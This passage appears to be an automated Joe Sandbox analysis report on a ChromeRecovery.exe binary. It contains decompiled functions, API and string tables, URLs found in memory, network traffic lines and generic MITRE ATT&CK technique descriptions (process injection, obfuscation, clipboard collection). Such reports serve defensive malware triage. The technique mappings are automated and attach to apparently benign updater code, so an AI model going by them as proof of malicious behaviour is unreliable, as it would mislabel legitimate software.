				__imp__SHGetFolderPathW(0, 0x23, 0, 0, _t48);
				if(0 >= 0) {
					if(PathAppendW(_t48, L"Google\\Update\\Log") == 0) {
						goto L3;
					} else {
						_t11 = _t48 - 0x10; // -16
						_t24 = E00C71B55(_t11, _t44);
						_t50 = _a4;
						 *_t50 = _t24 + 0x10;
						E00C713C0(E00C748AE( &_v8, 0xffffffff), _t11);
						_t23 = _t50;
					}
				} else {
					L3:
					E00C7189E(_a4, 0x104, 0, 0xca12c8);
					_t21 = E00C748AE( &_v8, 0xffffffff);
					_t9 = _t48 - 0x10; // -16
					E00C713C0(_t21, _t9);
					_t23 = _a4;
				}
				return _t23;
			}

0x00c733d9
0x00c733e4
0x00c733e9
0x00c733fe
0x00c73404
0x00c73409
0x00c73409
0x00c73414
0x00c7341c
0x00c73450
0x00000000
0x00c73452
0x00c73453
0x00c73458
0x00c7345d
0x00c73468
0x00c73471
0x00c73476
0x00c73478
0x00c7341e
0x00c7341e
0x00c73426
0x00c73430
0x00c73435
0x00c73438
0x00c7343d
0x00c7343d
0x00c7347b

APIs

Part of subcall function 00C713D8: GetProcessHeap.KERNEL32 ref: 00C713E9

SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,00000000,00000000,?,?,?,00C7348C,00000000,?,?,?,00C73554,00000000), ref: 00C73414
PathAppendW.SHLWAPI(00000000,Google\Update\Log,?,?,?,00C7348C,00000000,?,?,?,00C73554,00000000,?,?,00000000), ref: 00C73448

Strings

Google\Update\Log, xrefs: 00C73442

Memory Dump Source

Source File: 0000001B.00000002.445759701.0000000000C71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C70000, based on PE: true

Associated: 0000001B.00000002.445754141.0000000000C70000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445790129.0000000000C97000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445803577.0000000000CA8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445807460.0000000000CAB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_c70000_ChromeRecovery.jbxd

Similarity

API ID: Path$AppendFolderHeapProcess
String ID: Google\Update\Log
API String ID: 3687224657-1952252280
Opcode ID: 051bd42386762758a3ce571068e6c606a0262fa19b89194c18c6a5418f818f0a
Instruction ID: 4fccb6aba96189198bbc4f1600d70c3aae5e786fc2ca85afae3a2fe16b070c72
Opcode Fuzzy Hash: 051bd42386762758a3ce571068e6c606a0262fa19b89194c18c6a5418f818f0a
Instruction Fuzzy Hash: 5411E071700118ABDB18EF68CC469BEB7A8EF413107088668F84AE71C1DF30AF01E790

Uniqueness

Uniqueness Score: -1.00%

Function 00C7A413 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E00C7A413(void* __ecx, void* __edx, void* __eflags) {
				signed int _v8;
				void* _t19;
				void* _t24;

				_t19 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t24 = __ecx;
				E00C78623(_t24, L"uid-create-time", E00C93B10(E00C77495(__ecx), _t19, 0x989680, 0) + 0x49ef6f00);
				_v8 = _v8 & 0x00000000;
				E00C78413(_t24, L"uid-num-rotations",  &_v8);
				_v8 = _v8 + 1;
				return E00C78623(_t24, L"uid-num-rotations", _v8 + 1);
			}

0x00c7a413
0x00c7a416
0x00c7a417
0x00c7a41a
0x00c7a43c
0x00c7a441
0x00c7a451
0x00c7a45e
0x00c7a469

APIs

Part of subcall function 00C77495: GetSystemTimeAsFileTime.KERNEL32 ref: 00C774B5

__aulldiv.LIBCMT ref: 00C7A42A

Part of subcall function 00C78623: RegSetValueExW.ADVAPI32(00C77F74,00000000,00000000,00000004,?,00000004), ref: 00C78636

Part of subcall function 00C78413: SHQueryValueExW.SHLWAPI(00C77F74,00000000,00000000,00000000,?,00000000,00CA41C0,00CA41C0,?,00C78347,IsEnrolledToDomain,?,00000000,00000000,?,HKLM\Software\Google\UpdateDev\), ref: 00C78436

Strings

uid-num-rotations, xrefs: 00C7A449, 00C7A450, 00C7A45D
uid-create-time, xrefs: 00C7A437

Memory Dump Source

Source File: 0000001B.00000002.445759701.0000000000C71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C70000, based on PE: true

Associated: 0000001B.00000002.445754141.0000000000C70000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445790129.0000000000C97000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445803577.0000000000CA8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445807460.0000000000CAB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_c70000_ChromeRecovery.jbxd

Similarity

API ID: TimeValue$FileQuerySystem__aulldiv
String ID: uid-create-time$uid-num-rotations
API String ID: 2700563484-461279828
Opcode ID: 85d5eb232caf1641bd34d9c689b187c88f6a5c8f605e2050d24b95b37e8fa5b6
Instruction ID: 8bd2e627adef34d33b09621c3885d68f7ee2f82c4cdf5c3ac4f316e88f6725c3
Opcode Fuzzy Hash: 85d5eb232caf1641bd34d9c689b187c88f6a5c8f605e2050d24b95b37e8fa5b6
Instruction Fuzzy Hash: 4CF0ECA1B002047BDF14E6A5CC0FFBF656CCBC1B14F104059B505E7241DEF09E00A2B0

Uniqueness

Uniqueness Score: -1.00%

Function 00C76502 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00C76502(void* __ecx, WCHAR* __edx, void* __eflags) {
				WCHAR* _t9;
				long _t15;
				void* _t16;

				_t9 = __edx;
				_t16 = __ecx;
				E00C71AD8(_t16, __edx, E00C713D8());
				_t15 = GetEnvironmentVariableW(_t9, 0, 0);
				if(_t15 == 0) {
					E00C77ED7();
				} else {
					GetEnvironmentVariableW(_t9, E00C719E5(_t16, _t15), _t15);
					E00C748AE(_t16, 0xffffffff);
				}
				return _t16;
			}

0x00c76505
0x00c76507
0x00c76511
0x00c76521
0x00c76525
0x00c76543
0x00c76527
0x00c76532
0x00c7653c
0x00c7653c
0x00c7654d

APIs

Part of subcall function 00C713D8: GetProcessHeap.KERNEL32 ref: 00C713E9

GetEnvironmentVariableW.KERNEL32(LocalAppData,00000000,00000000), ref: 00C7651B
GetEnvironmentVariableW.KERNEL32(LocalAppData,00000000,00000000), ref: 00C76532

Strings

LocalAppData, xrefs: 00C7651A, 00C76531

Memory Dump Source

Source File: 0000001B.00000002.445759701.0000000000C71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C70000, based on PE: true

Associated: 0000001B.00000002.445754141.0000000000C70000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445790129.0000000000C97000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445803577.0000000000CA8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445807460.0000000000CAB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_c70000_ChromeRecovery.jbxd

Similarity

API ID: EnvironmentVariable$HeapProcess
String ID: LocalAppData
API String ID: 2836036715-1192612098
Opcode ID: a0345682923a1e650649005d53347cbd36b2c97fcebdbfa0d9bafc00d57a7608
Instruction ID: dd3f6410f1c50bca9ca70103c4837add9d2fcea9a22fb9d7a1e5b55a6d06d19e
Opcode Fuzzy Hash: a0345682923a1e650649005d53347cbd36b2c97fcebdbfa0d9bafc00d57a7608
Instruction Fuzzy Hash: 9CE0D871310A6037C624336E6C0BF3F845D8FC5B61F14425AF529D22E1CE94CD013261

Uniqueness

Uniqueness Score: -1.00%

Function 00C76C71 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00C76C71(void* __ecx, void* __edx) {
				intOrPtr* _t9;
				void* _t11;
				void* _t12;

				_t12 = __ecx;
				_t11 = __edx;
				if(__ecx == 0x80000003 || IsDebuggerPresent() != 0) {
					return 0;
				} else {
					OutputDebugStringW(L"**SehSendMinidump**\r\n");
					_t9 =  *0xca9bb8; // 0x0
					if(_t9 == 0) {
						return 1;
					}
					return  *((intOrPtr*)( *_t9 + 4))(_t12, _t11, 0x23c34600, 0);
				}
			}

0x00c76c72
0x00c76c75
0x00c76c7d
0x00000000
0x00c76c89
0x00c76c8e
0x00c76c94
0x00c76c9c
0x00000000
0x00c76cb0
0x00000000
0x00c76ca9

APIs

IsDebuggerPresent.KERNEL32 ref: 00C76C7F
OutputDebugStringW.KERNEL32 ref: 00C76C8E

Strings

**SehSendMinidump**, xrefs: 00C76C89

Memory Dump Source

Source File: 0000001B.00000002.445759701.0000000000C71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C70000, based on PE: true

Associated: 0000001B.00000002.445754141.0000000000C70000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445790129.0000000000C97000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445803577.0000000000CA8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445807460.0000000000CAB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_c70000_ChromeRecovery.jbxd

Similarity

API ID: DebugDebuggerOutputPresentString
String ID: **SehSendMinidump**
API String ID: 4086329628-2587082360
Opcode ID: 73b71ce1b281e1185021c35cd75504037d375fa02daa167b275386a32d84e86c
Instruction ID: 3c7a32d263e62bb184852ae805175343879a4e8d63cfe4cdacefe779edc671da
Opcode Fuzzy Hash: 73b71ce1b281e1185021c35cd75504037d375fa02daa167b275386a32d84e86c
Instruction Fuzzy Hash: 4DE0D8363198125FD31A1B36FD0CF6A3268DB82701B1580B9B55ED3110D6509D015160

Uniqueness

Uniqueness Score: -1.00%

Function 00C7470B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E00C7470B(void* __ecx) {
				long _t6;
				void* _t11;

				_t11 = __ecx;
				if( *(__ecx + 0x10) != 0) {
					_t6 = WaitForSingleObject( *(__ecx + 0x10), 0x1f4);
					__eflags = _t6;
					if(_t6 == 0) {
						L5:
						return 1;
					} else {
						__eflags = _t6 - 0x80;
						if(__eflags == 0) {
							goto L5;
						} else {
							_push( *((intOrPtr*)(_t11 + 0xc)));
							_push( *((intOrPtr*)(_t11 + 0x1c)));
							_push(L"LOG_SYSTEM: [%s]: Could not acquire logging mutex %s\n");
							OutputDebugStringW(E00C76CB8(__eflags));
							 *((char*)(_t11 + 9)) = 0;
							goto L1;
						}
					}
				} else {
					L1:
					return 0;
				}
			}

0x00c7470c
0x00c74712
0x00c74720
0x00c74726
0x00c74728
0x00c74751
0x00c74754
0x00c7472a
0x00c7472a
0x00c7472f
0x00000000
0x00c74731
0x00c74731
0x00c74734
0x00c74737
0x00c74745
0x00c7474b
0x00000000
0x00c7474b
0x00c7472f
0x00c74714
0x00c74714
0x00c74717
0x00c74717

APIs

WaitForSingleObject.KERNEL32 ref: 00C74720
OutputDebugStringW.KERNEL32 ref: 00C74745

Strings

LOG_SYSTEM: [%s]: Could not acquire logging mutex %s, xrefs: 00C74737

Memory Dump Source

Source File: 0000001B.00000002.445759701.0000000000C71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C70000, based on PE: true

Associated: 0000001B.00000002.445754141.0000000000C70000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445790129.0000000000C97000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445803577.0000000000CA8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445807460.0000000000CAB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_c70000_ChromeRecovery.jbxd

Similarity

API ID: DebugObjectOutputSingleStringWait
String ID: LOG_SYSTEM: [%s]: Could not acquire logging mutex %s
API String ID: 3023325665-3861772780
Opcode ID: b7cc7514e5c6d1ee2c953611b34591a76f35f03f39bc85284dbc6ff6f4a70b1a
Instruction ID: a9cd03b054301b083a5dd809f962de46df69339d943d06e8aa9a04221a2a8a02
Opcode Fuzzy Hash: b7cc7514e5c6d1ee2c953611b34591a76f35f03f39bc85284dbc6ff6f4a70b1a
Instruction Fuzzy Hash: 93E0D8315147519BCF382F34AC0978677E5BB02311F00C959F4A945590D760D659D751

Uniqueness

Uniqueness Score: -1.00%

Source: Ruleset Data.0.dr	String found in binary or memory: www.facebook.com equals www.facebook.com (Facebook)
Source: Filtering Rules.0.dr, Ruleset Data.0.dr	String found in binary or memory: www.facebook.com/ajax/ads/ equals www.facebook.com (Facebook)
Source: Filtering Rules.0.dr	String found in binary or memory: www.facebook.com0 equals www.facebook.com (Facebook)

Source: elevation_service.exe, 0000001A.00000003.442311508.0000016370DBD000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.441665354.0000016370DBD000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.441020365.0000016370DC2000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.441039081.0000016370DBA000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.444832780.0000016370DBE000.00000004.00000020.00020000.00000000.sdmp, ChromeRecovery.exe.26.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: elevation_service.exe, 0000001A.00000003.442311508.0000016370DBD000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.441665354.0000016370DBD000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.441020365.0000016370DC2000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.441039081.0000016370DBA000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.444832780.0000016370DBE000.00000004.00000020.00020000.00000000.sdmp, ChromeRecovery.exe.26.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: elevation_service.exe, 0000001A.00000003.442311508.0000016370DBD000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.441665354.0000016370DBD000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.441020365.0000016370DC2000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.441039081.0000016370DBA000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.444832780.0000016370DBE000.00000004.00000020.00020000.00000000.sdmp, ChromeRecovery.exe.26.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: elevation_service.exe, 0000001A.00000003.442311508.0000016370DBD000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.441665354.0000016370DBD000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.441020365.0000016370DC2000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.441039081.0000016370DBA000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.444832780.0000016370DBE000.00000004.00000020.00020000.00000000.sdmp, ChromeRecovery.exe.26.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: elevation_service.exe, 0000001A.00000003.442311508.0000016370DBD000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.441665354.0000016370DBD000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.441020365.0000016370DC2000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.441039081.0000016370DBA000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.444832780.0000016370DBE000.00000004.00000020.00020000.00000000.sdmp, ChromeRecovery.exe.26.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: ChromeRecovery.exe.26.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: elevation_service.exe, 0000001A.00000003.442311508.0000016370DBD000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.441665354.0000016370DBD000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.441020365.0000016370DC2000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.441039081.0000016370DBA000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.444832780.0000016370DBE000.00000004.00000020.00020000.00000000.sdmp, ChromeRecovery.exe.26.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: elevation_service.exe, 0000001A.00000003.442311508.0000016370DBD000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.441665354.0000016370DBD000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.441020365.0000016370DC2000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.441039081.0000016370DBA000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.444832780.0000016370DBE000.00000004.00000020.00020000.00000000.sdmp, ChromeRecovery.exe.26.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: elevation_service.exe, 0000001A.00000003.442311508.0000016370DBD000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.441665354.0000016370DBD000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.441020365.0000016370DC2000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.441039081.0000016370DBA000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.444832780.0000016370DBE000.00000004.00000020.00020000.00000000.sdmp, ChromeRecovery.exe.26.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: elevation_service.exe, 0000001A.00000003.442311508.0000016370DBD000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.441665354.0000016370DBD000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.441020365.0000016370DC2000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.441039081.0000016370DBA000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.444832780.0000016370DBE000.00000004.00000020.00020000.00000000.sdmp, ChromeRecovery.exe.26.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: elevation_service.exe, 0000001A.00000003.442311508.0000016370DBD000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.441665354.0000016370DBD000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.441020365.0000016370DC2000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.441039081.0000016370DBA000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.444832780.0000016370DBE000.00000004.00000020.00020000.00000000.sdmp, ChromeRecovery.exe.26.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: a7329646-d142-463e-9e85-cbe79cec5f02.tmp.1.dr, 07ece42e-0bcb-44f9-922c-b49f9471e5ae.tmp.1.dr	String found in binary or memory: https://accounts.google.com
Source: craw_window.js.0.dr	String found in binary or memory: https://accounts.google.com/MergeSession
Source: a7329646-d142-463e-9e85-cbe79cec5f02.tmp.1.dr, 07ece42e-0bcb-44f9-922c-b49f9471e5ae.tmp.1.dr	String found in binary or memory: https://apis.google.com
Source: a7329646-d142-463e-9e85-cbe79cec5f02.tmp.1.dr, 07ece42e-0bcb-44f9-922c-b49f9471e5ae.tmp.1.dr	String found in binary or memory: https://clients2.google.com
Source: manifest.json.0.dr	String found in binary or memory: https://clients2.google.com/service/update2/crx
Source: a7329646-d142-463e-9e85-cbe79cec5f02.tmp.1.dr, 07ece42e-0bcb-44f9-922c-b49f9471e5ae.tmp.1.dr	String found in binary or memory: https://clients2.googleusercontent.com
Source: LICENSE.txt.0.dr	String found in binary or memory: https://creativecommons.org/.
Source: LICENSE.txt.0.dr	String found in binary or memory: https://creativecommons.org/compatiblelicenses
Source: 176bd4d4-b466-471c-b2dc-78592e59bf93.tmp.1.dr, a7329646-d142-463e-9e85-cbe79cec5f02.tmp.1.dr, 24aeaaec-c6e1-418d-ae0b-78d4b9410155.tmp.1.dr, 07ece42e-0bcb-44f9-922c-b49f9471e5ae.tmp.1.dr	String found in binary or memory: https://dns.google
Source: LICENSE.txt.0.dr	String found in binary or memory: https://easylist.to/)
Source: a7329646-d142-463e-9e85-cbe79cec5f02.tmp.1.dr, 07ece42e-0bcb-44f9-922c-b49f9471e5ae.tmp.1.dr	String found in binary or memory: https://fonts.googleapis.com
Source: a7329646-d142-463e-9e85-cbe79cec5f02.tmp.1.dr, 07ece42e-0bcb-44f9-922c-b49f9471e5ae.tmp.1.dr	String found in binary or memory: https://fonts.gstatic.com
Source: LICENSE.txt.0.dr	String found in binary or memory: https://github.com/easylist)
Source: craw_window.js.0.dr, craw_background.js.0.dr	String found in binary or memory: https://github.com/google/closure-library/wiki/goog.module:-an-ES6-module-like-alternative-to-goog.p
Source: a7329646-d142-463e-9e85-cbe79cec5f02.tmp.1.dr, 07ece42e-0bcb-44f9-922c-b49f9471e5ae.tmp.1.dr	String found in binary or memory: https://ogs.google.com
Source: craw_window.js.0.dr, manifest.json.0.dr	String found in binary or memory: https://payments.google.com/payments/v4/js/integrator.js
Source: a7329646-d142-463e-9e85-cbe79cec5f02.tmp.1.dr, 07ece42e-0bcb-44f9-922c-b49f9471e5ae.tmp.1.dr	String found in binary or memory: https://play.google.com
Source: a7329646-d142-463e-9e85-cbe79cec5f02.tmp.1.dr	String found in binary or memory: https://r5---sn-h0jeln7l.gvt1.com
Source: a7329646-d142-463e-9e85-cbe79cec5f02.tmp.1.dr, 07ece42e-0bcb-44f9-922c-b49f9471e5ae.tmp.1.dr	String found in binary or memory: https://redirector.gvt1.com
Source: craw_window.js.0.dr, manifest.json.0.dr	String found in binary or memory: https://sandbox.google.com/payments/v4/js/integrator.js
Source: a7329646-d142-463e-9e85-cbe79cec5f02.tmp.1.dr, 07ece42e-0bcb-44f9-922c-b49f9471e5ae.tmp.1.dr	String found in binary or memory: https://ssl.gstatic.com
Source: craw_window.js.0.dr, craw_background.js.0.dr	String found in binary or memory: https://www-googleapis-staging.sandbox.google.com
Source: a7329646-d142-463e-9e85-cbe79cec5f02.tmp.1.dr, 07ece42e-0bcb-44f9-922c-b49f9471e5ae.tmp.1.dr	String found in binary or memory: https://www.google.com
Source: manifest.json.0.dr	String found in binary or memory: https://www.google.com/
Source: craw_window.js.0.dr	String found in binary or memory: https://www.google.com/accounts/OAuthLogin?issueuberauth=1
Source: craw_window.js.0.dr	String found in binary or memory: https://www.google.com/images/cleardot.gif
Source: craw_window.js.0.dr	String found in binary or memory: https://www.google.com/images/dot2.gif
Source: craw_window.js.0.dr	String found in binary or memory: https://www.google.com/images/x2.gif
Source: craw_background.js.0.dr	String found in binary or memory: https://www.google.com/intl/en-US/chrome/blank.html
Source: craw_window.js.0.dr, craw_background.js.0.dr, a7329646-d142-463e-9e85-cbe79cec5f02.tmp.1.dr, 07ece42e-0bcb-44f9-922c-b49f9471e5ae.tmp.1.dr	String found in binary or memory: https://www.googleapis.com
Source: manifest.json.0.dr	String found in binary or memory: https://www.googleapis.com/
Source: manifest.json.0.dr	String found in binary or memory: https://www.googleapis.com/auth/chromewebstore
Source: manifest.json.0.dr	String found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonly
Source: manifest.json.0.dr	String found in binary or memory: https://www.googleapis.com/auth/sierra
Source: manifest.json.0.dr	String found in binary or memory: https://www.googleapis.com/auth/sierrasandbox
Source: a7329646-d142-463e-9e85-cbe79cec5f02.tmp.1.dr, 07ece42e-0bcb-44f9-922c-b49f9471e5ae.tmp.1.dr	String found in binary or memory: https://www.gstatic.com

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
